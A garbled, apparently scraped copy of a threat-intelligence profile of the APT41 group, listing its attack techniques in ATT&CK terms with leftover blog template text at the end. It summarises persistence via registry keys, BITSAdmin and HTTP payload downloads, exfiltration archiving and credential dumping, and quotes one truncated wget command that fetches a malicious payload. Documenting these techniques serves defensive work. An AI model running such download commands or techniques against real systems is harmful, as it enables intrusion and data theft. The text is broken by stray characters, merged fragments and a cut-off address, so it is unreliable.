![]() ![]() ĪPT41 performed password brute-force attacks on the local admin account. APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike. īoot or Logon Autostart Execution: Registry Run Keys / Startup FolderĪPT41 created and modified startup files for persistence. ĪPT41 used BITSAdmin to download and install payloads. Īrchive Collected Data: Archive via Custom Methodĭuring C0017, APT41 hex-encoded PII data prior to exfiltration. Īrchive Collected Data: Archive via UtilityĪPT41 created a RAR archive of targeted files for exfiltration. Īpplication Layer Protocol: File Transfer ProtocolsĪPT41 used exploit payloads that initiate download via ftp. ĭuring C0017, APT41 ran wget 44:8080/kernel to download malicious payloads. Īpplication Layer Protocol: Web ProtocolsĪPT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits. ĪPT41 has added user accounts to the User and Admin groups. OS Credential Dumping: Security Account Manager,Įnterprise Layer download view Techniques Used Domainĭuring C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation. ![]() Obfuscated Files or Information: Software Packing, Masquerading: Masquerade Task or Service, ![]() Masquerading: Match Legitimate Name or Location, Live Version Associated Group Descriptions NameĪpplication Layer Protocol: Web Protocols,Īrchive Collected Data: Archive via Custom Method,Ĭommand and Scripting Interpreter: JavaScript,Ĭommand and Scripting Interpreter: Windows Command Shell,ĭata Obfuscation: Protocol Impersonation,Įxfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |